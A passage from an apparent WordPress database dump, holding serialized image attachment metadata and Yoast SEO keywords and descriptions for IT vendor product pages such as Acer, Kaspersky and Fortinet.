s:5:\"width\";i:940;s:6:\"height\";i:620;s:4:\"file\";s:20:\"2018/12/medium01.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"medium01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"medium01-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"medium01-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"medium01-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"medium01-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"medium01-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:18:\"medium01-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2686,2266,'_wp_attached_file','2018/12/d1.jpg'),(2687,2266,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:940;s:6:\"height\";i:620;s:4:\"file\";s:14:\"2018/12/d1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"d1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"d1-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"d1-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:14:\"d1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:14:\"d1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:14:\"d1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:12:\"d1-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2688,2267,'_wp_attached_file','2018/12/medium01-1.jpg'),(2689,2267,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:940;s:6:\"height\";i:620;s:4:\"file\";s:22:\"2018/12/medium01-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"medium01-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"medium01-1-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"medium01-1-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"medium01-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"medium01-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"medium01-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"medium01-1-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2690,2269,'_wp_attached_file','2018/12/medium01-2.jpg'),(2691,2269,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:940;s:6:\"height\";i:620;s:4:\"file\";s:22:\"2018/12/medium01-2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"medium01-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"medium01-2-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"medium01-2-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"medium01-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"medium01-2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"medium01-2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"medium01-2-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2692,2270,'_wp_attached_file','2018/12/medium01-3.jpg'),(2693,2270,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:940;s:6:\"height\";i:620;s:4:\"file\";s:22:\"2018/12/medium01-3.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"medium01-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"medium01-3-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"medium01-3-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"medium01-3-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"medium01-3-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"medium01-3-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"medium01-3-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2694,2271,'_wp_attached_file','2018/12/medium01-4.jpg'),(2695,2271,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:940;s:6:\"height\";i:620;s:4:\"file\";s:22:\"2018/12/medium01-4.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"medium01-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"medium01-4-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"medium01-4-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"medium01-4-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"medium01-4-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"medium01-4-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"medium01-4-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2696,1546,'_yoast_wpseo_focuskw','LG'),(2697,1546,'_yoast_wpseo_metadesc','Explore all you have ever wanted in a monitor with LGâ€™s 21:9 Ultrawide. featuring a wider viewing space experience suitable for both work and gaming.'),(2698,1546,'_yoast_wpseo_linkdex','77'),(2699,1544,'_yoast_wpseo_focuskw','kingston'),(2700,1544,'_yoast_wpseo_metadesc','RELIABLE SD CARDS, SSD DRIVES, MEMORY MODULES AND USB FLASH DRIVES FOR CONSUMERS, BUSINESSES, ENTERPRISES AND SYSTEM BUILDERS OFFERED BY KINGSTON.'),(2701,1544,'_yoast_wpseo_linkdex','90'),(2702,1544,'_yoast_wpseo_content_score','60'),(2703,1474,'_yoast_wpseo_focuskw','Fortinet'),(2704,1474,'_yoast_wpseo_metadesc','Fortinet provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric.'),(2705,1474,'_yoast_wpseo_linkdex','81'),(2706,2281,'_wp_attached_file','2018/12/KESB-Select.png'),(2707,2281,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:293;s:6:\"height\";i:220;s:4:\"file\";s:23:\"2018/12/KESB-Select.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"KESB-Select-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"KESB-Select-293x150.png\";s:5:\"width\";i:293;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"KESB-Select-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2708,2283,'_wp_attached_file','2018/12/KESB-Select2.png'),(2709,2283,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:293;s:6:\"height\";i:220;s:4:\"file\";s:24:\"2018/12/KESB-Select2.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"KESB-Select2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"KESB-Select2-293x150.png\";s:5:\"width\";i:293;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"KESB-Select2-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2710,2284,'_wp_attached_file','2018/12/KESB-Select3.png'),(2711,2284,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:293;s:6:\"height\";i:220;s:4:\"file\";s:24:\"2018/12/KESB-Select3.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"KESB-Select3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"KESB-Select3-293x150.png\";s:5:\"width\";i:293;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"KESB-Select3-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2712,1543,'_yoast_wpseo_focuskw','kaspersky'),(2713,1543,'_yoast_wpseo_metadesc','With more of your business operations going digital, you need to protect every server, laptop & mobile device. In a single solution â€“ with one easy-to-use management console â€“ we deliver Next-Gen Security that helps you protect every endpoint your business runs.'),(2714,1543,'_yoast_wpseo_linkdex','72'),(2715,1543,'_yoast_wpseo_content_score','60'),(2716,1597,'_yoast_wpseo_focuskw','Solarwinds'),(2717,1597,'_yoast_wpseo_content_score','30'),(2718,1533,'_yoast_wpseo_content_score','60'),(2719,1597,'_yoast_wpseo_linkdex','84'),(2720,1533,'_yoast_wpseo_focuskw','juniper'),(2721,1533,'_yoast_wpseo_metadesc','Advanced technologies engineered to help you solve the toughest challenges in networking.'),(2722,1533,'_yoast_wpseo_linkdex','76'),(2723,2290,'_wp_attached_file','2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero.png'),(2724,2290,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:366;s:4:\"file\";s:64:\"2018/12/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:64:\"419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:64:\"419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:64:\"419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:64:\"419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:62:\"419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2725,1531,'_yoast_wpseo_focuskw','InFocus'),(2726,1531,'_yoast_wpseo_metadesc','InFocus offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone/anytime/anywhere.'),(2727,1531,'_yoast_wpseo_linkdex','86'),(2728,1531,'_yoast_wpseo_content_score','60'),(2729,1526,'_yoast_wpseo_focuskw','houdini'),(2730,1526,'_yoast_wpseo_metadesc','Houdini is built from the ground up to be a procedural system that empowers artists to work freely, create multiple iterations and rapidly share workflows with colleagues.'),(2731,1526,'_yoast_wpseo_linkdex','66'),(2732,1526,'_yoast_wpseo_content_score','30'),(2733,1597,'_yoast_wpseo_metadesc','Solarwinds product give organizations worldwide, regardless of type, size or IT infrastructure complexity, the power to monitor and manage the performance of their IT environments, whether on-premises, in the cloud, or in hybrid models.'),(2734,1482,'_yoast_wpseo_focuskw','Fuji Xerox'),(2735,1482,'_yoast_wpseo_metadesc','Fuji Xerox printers and all-in-one printers are ideal fit for both small & medium business environments, whether you need vibrant color, black-and-white printing, or more robust features to handle sophisticated document workflows. All of our printers and desktop all-in-one printers offer built-in productivity and reliability you can count on.'),(2736,1482,'_yoast_wpseo_linkdex','76'),(2737,1482,'_yoast_wpseo_content_score','30'),(2738,1597,'_oembed_ab2c7ffcfdcc4c9c70e71fdc7254260c','{{unknown}}'),(2739,1478,'_yoast_wpseo_content_score','30'),(2740,2306,'_wp_attached_file','2018/12/Swift_7_Ale_preview.png'),(2741,2306,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:31:\"2018/12/Swift_7_Ale_preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Swift_7_Ale_preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Swift_7_Ale_preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:31:\"Swift_7_Ale_preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:31:\"Swift_7_Ale_preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:29:\"Swift_7_Ale_preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2742,2307,'_wp_attached_file','2018/12/Acer-Spin-1-SP111-34N-preview.png'),(2743,2307,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:41:\"2018/12/Acer-Spin-1-SP111-34N-preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Acer-Spin-1-SP111-34N-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Acer-Spin-1-SP111-34N-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:41:\"Acer-Spin-1-SP111-34N-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:41:\"Acer-Spin-1-SP111-34N-preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:39:\"Acer-Spin-1-SP111-34N-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2744,2308,'_wp_attached_file','2018/12/acer-spin-3-SP314-52-gray-preview.png'),(2745,2308,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:45:\"2018/12/acer-spin-3-SP314-52-gray-preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"acer-spin-3-SP314-52-gray-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"acer-spin-3-SP314-52-gray-preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:45:\"acer-spin-3-SP314-52-gray-preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:45:\"acer-spin-3-SP314-52-gray-preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:43:\"acer-spin-3-SP314-52-gray-preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2746,2309,'_wp_attached_file','2018/12/Spin-5-SP515_preview.png'),(2747,2309,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:474;s:6:\"height\";i:351;s:4:\"file\";s:32:\"2018/12/Spin-5-SP515_preview.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Spin-5-SP515_preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Spin-5-SP515_preview-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"Spin-5-SP515_preview-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"Spin-5-SP515_preview-474x300.png\";s:5:\"width\";i:474;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"Spin-5-SP515_preview-20x15.png\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2748,2310,'_wp_attached_file','2018/12/Acer_Switch_Alpha_12_SA5-271-preview.pn